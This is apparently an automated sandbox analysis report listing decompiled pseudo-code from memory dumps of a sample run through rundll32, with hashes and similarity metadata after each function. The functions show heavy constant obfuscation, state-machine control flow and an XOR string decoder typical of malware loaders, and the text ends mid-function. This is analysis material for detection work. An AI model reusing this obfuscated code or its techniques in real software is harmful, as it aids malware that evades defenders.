                                                                                                                      				 *(_t94 + 0x24) =  *(_t94 + 0x24) + 0x149f;
                                                                                                                      				 *(_t94 + 0x24) =  *(_t94 + 0x24) ^ 0x00c381cf;
                                                                                                                      				 *(_t94 + 0x34) = 0x8cac1;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) | 0xffff7fdf;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0xfffda11e;
                                                                                                                      				 *(_t94 + 0x20) = 0x3c356c;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) * 0x2a;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x83f9;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09ee4754;
                                                                                                                      				_t66 =  *_t82;
                                                                                                                      				_t81 =  &(_t80[1]);
                                                                                                                      				_t46 =  *_t80 ^ _t66;
                                                                                                                      				 *(_t94 + 0x28) = _t66;
                                                                                                                      				 *(_t94 + 0x2c) = _t46;
                                                                                                                      				_t24 = _t46 + 1; // 0x3c356d
                                                                                                                      				_t84 =  !=  ? (_t24 & 0xfffffffc) + 4 : _t24;
                                                                                                                      				_t95 = _t94 + 0xc;
                                                                                                                      				_t63 = E00353512(_t84 + _t84);
                                                                                                                      				 *((intOrPtr*)(_t95 + 0x28)) = _t63;
                                                                                                                      				if(_t63 != 0) {
                                                                                                                      					_t92 = 0;
                                                                                                                      					_t79 = _t63;
                                                                                                                      					_t90 =  >  ? 0 :  &(_t81[_t84 >> 2]) - _t81 + 3 >> 2;
                                                                                                                      					if(_t90 != 0) {
                                                                                                                      						_t64 =  *(_t95 + 0x18);
                                                                                                                      						do {
                                                                                                                      							_t74 =  *_t81;
                                                                                                                      							_t81 =  &(_t81[1]);
                                                                                                                      							_t75 = _t74 ^ _t64;
                                                                                                                      							 *_t79 = _t75 & 0x000000ff;
                                                                                                                      							_t79 = _t79 + 8;
                                                                                                                      							 *((short*)(_t79 - 6)) = _t75 >> 0x00000008 & 0x000000ff;
                                                                                                                      							_t76 = _t75 >> 0x10;
                                                                                                                      							_t92 = _t92 + 1;
                                                                                                                      							 *((short*)(_t79 - 4)) = _t76 & 0x000000ff;
                                                                                                                      							 *((short*)(_t79 - 2)) = _t76 >> 0x00000008 & 0x000000ff;
                                                                                                                      						} while (_t92 < _t90);
                                                                                                                      						_t63 =  *((intOrPtr*)(_t95 + 0x24));
                                                                                                                      					}
                                                                                                                      					 *((short*)(_t63 +  *(_t95 + 0x1c) * 2)) = 0;
                                                                                                                      				}
                                                                                                                      				return _t63;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TG
                                                                                                                      • API String ID: 0-2762469129
                                                                                                                      • Opcode ID: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction ID: b43fc238f7b61acfdf5fdfceef64e99dcb981fd7074279af20cb57a0255ccb63
                                                                                                                      • Opcode Fuzzy Hash: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction Fuzzy Hash: B9317C726097118BC714DF28C48546AF7E0FF88728F455B2DF889AB250D774EE09CB9A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0035109E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t76;
                                                                                                                      				void* _t82;
                                                                                                                      				void* _t83;
                                                                                                                      				signed int _t85;
                                                                                                                      				signed int _t86;
                                                                                                                      				signed int _t87;
                                                                                                                      				void* _t96;
                                                                                                                      				void* _t97;
                                                                                                                      				signed int* _t99;
                                                                                                                      
                                                                                                                      				_t99 =  &_v28;
                                                                                                                      				_v24 = 0xd283c4;
                                                                                                                      				_v24 = _v24 >> 8;
                                                                                                                      				_v24 = _v24 << 9;
                                                                                                                      				_t83 = __ecx;
                                                                                                                      				_t96 = 0;
                                                                                                                      				_t85 = 0x2d;
                                                                                                                      				_v24 = _v24 / _t85;
                                                                                                                      				_v24 = _v24 ^ 0x0004da81;
                                                                                                                      				_t97 = 0xc7350e4;
                                                                                                                      				_v16 = 0x64139d;
                                                                                                                      				_v16 = _v16 >> 0xe;
                                                                                                                      				_v16 = _v16 >> 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x00062b71;
                                                                                                                      				_v28 = 0xade301;
                                                                                                                      				_v28 = _v28 ^ 0x8f618bae;
                                                                                                                      				_v28 = _v28 >> 4;
                                                                                                                      				_t86 = 0x7e;
                                                                                                                      				_v28 = _v28 / _t86;
                                                                                                                      				_v28 = _v28 ^ 0x001433c5;
                                                                                                                      				_v20 = 0x6fd8b7;
                                                                                                                      				_v20 = _v20 << 5;
                                                                                                                      				_t87 = 0x39;
                                                                                                                      				_v20 = _v20 / _t87;
                                                                                                                      				_v20 = _v20 ^ 0x003ef69f;
                                                                                                                      				_v4 = 0x5f989c;
                                                                                                                      				_v4 = _v4 + 0xda74;
                                                                                                                      				_v4 = _v4 ^ 0x006bc492;
                                                                                                                      				_v12 = 0x987d41;
                                                                                                                      				_v12 = _v12 << 9;
                                                                                                                      				_v12 = _v12 + 0x3c41;
                                                                                                                      				_v12 = _v12 ^ 0x30fa219f;
                                                                                                                      				_v8 = 0x945ab1;
                                                                                                                      				_v8 = _v8 >> 2;
                                                                                                                      				_v8 = _v8 ^ 0x002dcc5b;
                                                                                                                      				do {
                                                                                                                      					while(_t97 != 0xa0feddc) {
                                                                                                                      						if(_t97 == 0xc7350e4) {
                                                                                                                      							_t97 = 0xf55d56d;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t97 == 0xf55d56d) {
                                                                                                                      								_t82 = E0035274F();
                                                                                                                      								_t99 = _t99 - 0xc + 0xc;
                                                                                                                      								_t97 = 0xa0feddc;
                                                                                                                      								_t96 = _t96 + _t82;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L7;
                                                                                                                      					}
                                                                                                                      					_t76 = E0034B782(_t83 + 4, _v4, _v12, _v8);
                                                                                                                      					_t99 =  &(_t99[2]);
                                                                                                                      					_t97 = 0x490b4c9;
                                                                                                                      					_t96 = _t96 + _t76;
                                                                                                                      					L7:
                                                                                                                      				} while (_t97 != 0x490b4c9);
                                                                                                                      				return _t96;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A<
                                                                                                                      • API String ID: 0-2278821948
                                                                                                                      • Opcode ID: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction ID: 54c06ed8d41e4641822d31bc4e57446e2d83bc4aeeff6743118a3debfa4ce6c1
                                                                                                                      • Opcode Fuzzy Hash: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction Fuzzy Hash: 503189729083018BC305DE25C84941BBBE1FBD4B58F118A6DF989AB260D3B1DE0CCB97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E00348650(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				void* _t83;
                                                                                                                      				signed int _t102;
                                                                                                                      				signed int _t103;
                                                                                                                      				signed int _t104;
                                                                                                                      				signed int _t105;
                                                                                                                      				void* _t118;
                                                                                                                      				signed int _t119;
                                                                                                                      
                                                                                                                      				_push(_a4);
                                                                                                                      				_t118 = __edx;
                                                                                                                      				_push(__edx);
                                                                                                                      				E0034CF25(_t83);
                                                                                                                      				_v36 = _v36 & 0x00000000;
                                                                                                                      				_v32 = _v32 & 0x00000000;
                                                                                                                      				_v40 = 0x27bdd4;
                                                                                                                      				_v24 = 0x769f2a;
                                                                                                                      				_v24 = _v24 << 1;
                                                                                                                      				_v24 = _v24 ^ 0x00e6321c;
                                                                                                                      				_v8 = 0xfef45c;
                                                                                                                      				_t102 = 0x31;
                                                                                                                      				_v8 = _v8 / _t102;
                                                                                                                      				_v8 = _v8 | 0xf1ae833d;
                                                                                                                      				_v8 = _v8 ^ 0x9231f40a;
                                                                                                                      				_v8 = _v8 ^ 0x6392d2fe;
                                                                                                                      				_v16 = 0x3d43fb;
                                                                                                                      				_v16 = _v16 >> 4;
                                                                                                                      				_v16 = _v16 ^ 0x97e6d5b2;
                                                                                                                      				_v16 = _v16 ^ 0x97eefe03;
                                                                                                                      				_v12 = 0x33c712;
                                                                                                                      				_v12 = _v12 >> 7;
                                                                                                                      				_v12 = _v12 + 0x2d9c;
                                                                                                                      				_t103 = 0x16;
                                                                                                                      				_v12 = _v12 / _t103;
                                                                                                                      				_v12 = _v12 ^ 0x00054cf8;
                                                                                                                      				_v28 = 0xb0e606;
                                                                                                                      				_v28 = _v28 | 0xfcdd39f2;
                                                                                                                      				_v28 = _v28 * 0x19;
                                                                                                                      				_v28 = _v28 ^ 0xb4c190eb;
                                                                                                                      				E00345AE2(_t103);
                                                                                                                      				_v24 = 0x8c0b06;
                                                                                                                      				_v24 = _v24 + 0x3875;
                                                                                                                      				_v24 = _v24 ^ 0xc8b8cfa1;
                                                                                                                      				_v24 = _v24 ^ 0xc8348cde;
                                                                                                                      				_v20 = 0xa003e6;
                                                                                                                      				_t104 = 0x69;
                                                                                                                      				_v20 = _v20 / _t104;
                                                                                                                      				_t105 = 0x51;
                                                                                                                      				_v20 = _v20 / _t105;
                                                                                                                      				_v20 = _v20 ^ 0x000004c1;
                                                                                                                      				_t119 = E0034EF71(_v24, _v20);
                                                                                                                      				_push(_t119);
                                                                                                                      				_push(_v28);
                                                                                                                      				_push(_t118);
                                                                                                                      				E00345A07(1, _v12);
                                                                                                                      				 *((short*)(_t118 + _t119 * 2)) = 0;
                                                                                                                      				return 0;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: u8
                                                                                                                      • API String ID: 0-999499730
                                                                                                                      • Opcode ID: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction ID: ffa79f16e3a35e7588c03e99e36c4e835da288648aaedd536a88a7d320e7572c
                                                                                                                      • Opcode Fuzzy Hash: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction Fuzzy Hash: 22313471D00209EBDB09CFA5C98AAEFBBB1FF44314F208059E515BA2A0D7B55B54CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0034EC9B(void* __ecx, signed int __edx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _t99;
                                                                                                                      				intOrPtr _t104;
                                                                                                                      				signed int _t114;
                                                                                                                      				signed int _t115;
                                                                                                                      				signed int _t116;
                                                                                                                      
                                                                                                                      				_v52 = _v52 & 0x00000000;
                                                                                                                      				_v48 = _v48 & 0x00000000;
                                                                                                                      				_v56 = 0x52d5fa;
                                                                                                                      				_v32 = 0xd2ae86;
                                                                                                                      				_v32 = _v32 >> 6;
                                                                                                                      				_v32 = _v32 ^ 0x0000dff8;
                                                                                                                      				_v8 = 0x945d31;
                                                                                                                      				_v8 = _v8 >> 9;
                                                                                                                      				_v8 = _v8 | 0xfea629bb;
                                                                                                                      				_t114 = __edx;
                                                                                                                      				_v8 = _v8 * 0x68;
                                                                                                                      				_v8 = _v8 ^ 0x739e55b5;
                                                                                                                      				_v16 = 0xe343a6;
                                                                                                                      				_v16 = _v16 + 0xffffaeee;
                                                                                                                      				_v16 = _v16 << 0xd;
                                                                                                                      				_v16 = _v16 ^ 0x5e55869e;
                                                                                                                      				_v28 = 0xa35055;
                                                                                                                      				_v28 = _v28 ^ 0xccdb3a8a;
                                                                                                                      				_v28 = _v28 ^ 0xcc747f7c;
                                                                                                                      				_v12 = 0x417a71;
                                                                                                                      				_t115 = 0xc;
                                                                                                                      				_v12 = _v12 / _t115;
                                                                                                                      				_v12 = _v12 + 0xffffd743;
                                                                                                                      				_v12 = _v12 ^ 0x254bb370;
                                                                                                                      				_v12 = _v12 ^ 0x25474737;
                                                                                                                      				_v36 = 0x5ce014;
                                                                                                                      				_v36 = _v36 << 0xb;
                                                                                                                      				_v36 = _v36 ^ 0xe70ab788;
                                                                                                                      				_v20 = 0x24db01;
                                                                                                                      				_t116 = 0x63;
                                                                                                                      				_v20 = _v20 * 0x3c;
                                                                                                                      				_v20 = _v20 + 0xe28f;
                                                                                                                      				_v20 = _v20 ^ 0x08ab7f21;
                                                                                                                      				_v44 = 0x4977db;
                                                                                                                      				_v44 = _v44 * 0x38;
                                                                                                                      				_v44 = _v44 ^ 0x1015e45e;
                                                                                                                      				_v24 = 0xa0027c;
                                                                                                                      				_v24 = _v24 | 0xcfe9110c;
                                                                                                                      				_v24 = _v24 + 0xffff4bac;
                                                                                                                      				_v24 = _v24 ^ 0xcfe5f801;
                                                                                                                      				_v40 = 0x81bf9e;
                                                                                                                      				_v40 = _v40 / _t116;
                                                                                                                      				_v40 = _v40 ^ 0x000d137a;
                                                                                                                      				_push(_v28);
                                                                                                                      				_push(_v16);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_t99 = E003607D7(_v12, _v36, E0034AB66(_v32, _v8, _v40), _v20);
                                                                                                                      				_t104 =  *0x365c8c; // 0x0
                                                                                                                      				 *((intOrPtr*)(_t104 + 4 + _t114 * 4)) = _t99;
                                                                                                                      				return E0034AE03(_v44, _v24, _v40, _t98);
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7GG%
                                                                                                                      • API String ID: 0-3444672964
                                                                                                                      • Opcode ID: fa2c9db9d154bac8161efa8499b148b1940ea687dd285436322002f3e94f6c08
                                                                                                                      • Instruction ID: 90942ff827433b84a14db84b984c4ef41e87af270e8fbb2cb91ae95bd36959f3
                                                                                                                      • Opcode Fuzzy Hash: fa2c9db9d154bac8161efa8499b148b1940ea687dd285436322002f3e94f6c08
                                                                                                                      • Instruction Fuzzy Hash: 6241EFB1C01219AFCB08CFE5C98A9DEBFB1FB48314F208199D511BA260C7B51A46CFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00353512(void* __ecx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				signed int _t83;
                                                                                                                      				void* _t88;
                                                                                                                      
                                                                                                                      				_v36 = _v36 & 0x00000000;
                                                                                                                      				_v48 = 0xd3138f;
                                                                                                                      				_v44 = 0xbafb06;
                                                                                                                      				_v40 = 0xb4c902;
                                                                                                                      				_v28 = 0x9a00a8;
                                                                                                                      				_v28 = _v28 + 0xffff4980;
                                                                                                                      				_v28 = _v28 + 0xffff4b07;
                                                                                                                      				_v28 = _v28 ^ 0x00989527;
                                                                                                                      				_v12 = 0x37fcba;
                                                                                                                      				_v12 = _v12 + 0xffff1054;
                                                                                                                      				_v12 = _v12 ^ 0xaae49dfe;
                                                                                                                      				_v12 = _v12 | 0x5520ddcc;
                                                                                                                      				_v12 = _v12 ^ 0xfff3c0c4;
                                                                                                                      				_v8 = 0xafb0cb;
                                                                                                                      				_t88 = __ecx;
                                                                                                                      				_t83 = 0x7b;
                                                                                                                      				_v8 = _v8 / _t83;
                                                                                                                      				_v8 = _v8 << 0xb;
                                                                                                                      				_v8 = _v8 + 0xffff2cb4;
                                                                                                                      				_v8 = _v8 ^ 0x0b6cc095;
                                                                                                                      				_v24 = 0x7eb81c;
                                                                                                                      				_v24 = _v24 | 0x606632c5;
                                                                                                                      				_v24 = _v24 + 0x73a0;
                                                                                                                      				_v24 = _v24 * 0x3c;
                                                                                                                      				_v24 = _v24 ^ 0x9dca2ad3;
                                                                                                                      				_v20 = 0x11602;
                                                                                                                      				_v20 = _v20 * 0x5d;
                                                                                                                      				_v20 = _v20 + 0xd70f;
                                                                                                                      				_v20 = _v20 + 0x91d0;
                                                                                                                      				_v20 = _v20 ^ 0x006b4c23;
                                                                                                                      				_v32 = 0x7d7f;
                                                                                                                      				_v32 = _v32 + 0x7879;
                                                                                                                      				_v32 = _v32 ^ 0x000fb411;
                                                                                                                      				_v16 = 0xa8b2e1;
                                                                                                                      				_v16 = _v16 >> 0xf;
                                                                                                                      				_v16 = _v16 + 0xffff543c;
                                                                                                                      				_v16 = _v16 ^ 0xd60d7738;
                                                                                                                      				_v16 = _v16 ^ 0x29f40b7c;
                                                                                                                      				return E00347A47(_v28, _v24, _v20, E00355BB3(), _t88, _v32, _v16);
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #Lk
                                                                                                                      • API String ID: 0-1139186034
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E0034FD8C() {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				unsigned int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				short _t136;
                                                                                                                      				short _t138;
                                                                                                                      				signed int _t141;
                                                                                                                      				signed int _t144;
                                                                                                                      				void* _t145;
                                                                                                                      				void* _t146;
                                                                                                                      				intOrPtr _t164;
                                                                                                                      				void* _t165;
                                                                                                                      				short* _t166;
                                                                                                                      				short* _t167;
                                                                                                                      				void* _t168;
                                                                                                                      				short* _t169;
                                                                                                                      				signed int _t170;
                                                                                                                      				signed int _t171;
                                                                                                                      				signed int _t172;
                                                                                                                      				signed int _t173;
                                                                                                                      				void* _t174;
                                                                                                                      
                                                                                                                      				_t164 =  *0x36520c; // 0x0
                                                                                                                      				_v8 = 0xafc848;
                                                                                                                      				_t165 = _t164 + 0x220;
                                                                                                                      				_t146 = 0xaad6b4c;
                                                                                                                      				_t170 = 0xc;
                                                                                                                      				_v8 = _v8 / _t170;
                                                                                                                      				_v8 = _v8 ^ 0xeddef8c6;
                                                                                                                      				_v8 = _v8 >> 4;
                                                                                                                      				_v8 = _v8 ^ 0x0edbb261;
                                                                                                                      				_v16 = 0xa05fce;
                                                                                                                      				_v16 = _v16 + 0x102e;
                                                                                                                      				_v16 = _v16 + 0x8702;
                                                                                                                      				_v16 = _v16 ^ 0x00a5637b;
                                                                                                                      				_v48 = 0xdd0656;
                                                                                                                      				_v48 = _v48 >> 2;
                                                                                                                      				_v48 = _v48 ^ 0x00330133;
                                                                                                                      				_v24 = 0x8dacbc;
                                                                                                                      				_t144 = 0x5c;
                                                                                                                      				_t171 = 0x3d;
                                                                                                                      				_v24 = _v24 * 0x19;
                                                                                                                      				_v24 = _v24 / _t144;
                                                                                                                      				_v24 = _v24 ^ 0x00283487;
                                                                                                                      				_v20 = 0x519264;
                                                                                                                      				_t145 = 2;
                                                                                                                      				_v20 = _v20 * 0x67;
                                                                                                                      				_v20 = _v20 << 1;
                                                                                                                      				_v20 = _v20 ^ 0x41a5f983;
                                                                                                                      				_v32 = 0xc0edbc;
                                                                                                                      				_v32 = _v32 * 0x1e;
                                                                                                                      				_v32 = _v32 << 0x10;
                                                                                                                      				_v32 = _v32 ^ 0xdc023425;
                                                                                                                      				_v28 = 0xb6ecb7;
                                                                                                                      				_v28 = _v28 * 0x1e;
                                                                                                                      				_v28 = _v28 + 0x349f;
                                                                                                                      				_v28 = _v28 ^ 0x156255f9;
                                                                                                                      				_v36 = 0x8be990;
                                                                                                                      				_v36 = _v36 | 0x6444358b;
                                                                                                                      				_v36 = _v36 * 0x59;
                                                                                                                      				_v36 = _v36 ^ 0x0c402a41;
                                                                                                                      				_v52 = 0xcdd122;
                                                                                                                      				_v52 = _v52 ^ 0xde2c2ef8;
                                                                                                                      				_v52 = _v52 ^ 0xdee78ce8;
                                                                                                                      				_v40 = 0xa1b7cb;
                                                                                                                      				_v40 = _v40 ^ 0x66c9ba9b;
                                                                                                                      				_v40 = _v40 + 0xffffb195;
                                                                                                                      				_v40 = _v40 ^ 0x666fdaad;
                                                                                                                      				_v56 = 0x9437d4;
                                                                                                                      				_v56 = _v56 / _t171;
                                                                                                                      				_v56 = _v56 ^ 0x00087e9b;
                                                                                                                      				_v12 = 0x6793e4;
                                                                                                                      				_v12 = _v12 << 2;
                                                                                                                      				_v12 = _v12 >> 8;
                                                                                                                      				_v12 = _v12 << 3;
                                                                                                                      				_v12 = _v12 ^ 0x000c2cdf;
                                                                                                                      				_v44 = 0x8cb917;
                                                                                                                      				_v44 = _v44 >> 0xf;
                                                                                                                      				_v44 = _v44 << 6;
                                                                                                                      				_v44 = _v44 ^ 0x00016464;
                                                                                                                      				do {
                                                                                                                      					while(_t146 != 0xa09253) {
                                                                                                                      						if(_t146 == 0x53e5fac) {
                                                                                                                      							_t172 = E0034EF71(4, 0x10);
                                                                                                                      							_push(_t172);
                                                                                                                      							_push(_v56);
                                                                                                                      							_push(_t165);
                                                                                                                      							E00345A07(1, _v40);
                                                                                                                      							_t174 = _t174 + 0x14;
                                                                                                                      							_t167 = _t165 + _t172 * 2;
                                                                                                                      							_t146 = 0xa09253;
                                                                                                                      							_t136 = 0x2e;
                                                                                                                      							 *_t167 = _t136;
                                                                                                                      							_t165 = _t167 + _t145;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t146 == 0xaad6b4c) {
                                                                                                                      								_t138 = E00345AE2(_t146);
                                                                                                                      								_t146 = 0xd305119;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t146 == 0xd305119) {
                                                                                                                      									_t141 = E0034EF71(4, 0x10);
                                                                                                                      									_push(1);
                                                                                                                      									_push(_v20);
                                                                                                                      									_push(_t165);
                                                                                                                      									_t173 = _t141;
                                                                                                                      									E00345A07(_t145, _v24);
                                                                                                                      									_push(_t173);
                                                                                                                      									_push(_v28);
                                                                                                                      									_t168 = _t165 + _t145;
                                                                                                                      									_push(_t168);
                                                                                                                      									E00345A07(1, _v32);
                                                                                                                      									_t174 = _t174 + 0x20;
                                                                                                                      									_t169 = _t168 + _t173 * 2;
                                                                                                                      									_t146 = 0x53e5fac;
                                                                                                                      									_t138 = 0x5c;
                                                                                                                      									 *_t169 = _t138;
                                                                                                                      									_t165 = _t169 + _t145;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L9;
                                                                                                                      					}
                                                                                                                      					_push(3);
                                                                                                                      					_push(_v44);
                                                                                                                      					_push(_t165);
                                                                                                                      					E00345A07(1, _v12);
                                                                                                                      					_t166 = _t165 + 6;
                                                                                                                      					_t174 = _t174 + 0xc;
                                                                                                                      					_t146 = 0xc2dacde;
                                                                                                                      					 *_t166 = 0;
                                                                                                                      					_t165 = _t166 + _t145;
                                                                                                                      					L9:
                                                                                                                      				} while (_t146 != 0xc2dacde);
                                                                                                                      				return _t138;
                                                                                                                      			}


































                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • Opcode ID: 58d5ece5394ff60d8422bdb6f3c2f70c600b81f2e45301c612aeb3684467fd80
                                                                                                                      • Instruction ID: c038a6f9a0ff0671fe2e243c75dccf07d11e215e702fd14916bb9fb1b0fef389
                                                                                                                      • Opcode Fuzzy Hash: 58d5ece5394ff60d8422bdb6f3c2f70c600b81f2e45301c612aeb3684467fd80
                                                                                                                      • Instruction Fuzzy Hash: 7B615775D01209ABDB09DFA4C88A9EEFBB1FF44714F204119E212BB291D3B52A45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 82%
                                                                                                                      			E0035E498(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				void* _v68;
                                                                                                                      				intOrPtr _v72;
                                                                                                                      				char _v592;
                                                                                                                      				void* _t122;
                                                                                                                      				signed int _t137;
                                                                                                                      				signed int _t138;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t122);
                                                                                                                      				_v72 = 0xec580c;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t137 = 0x76;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v48 = 0xa71dc1;
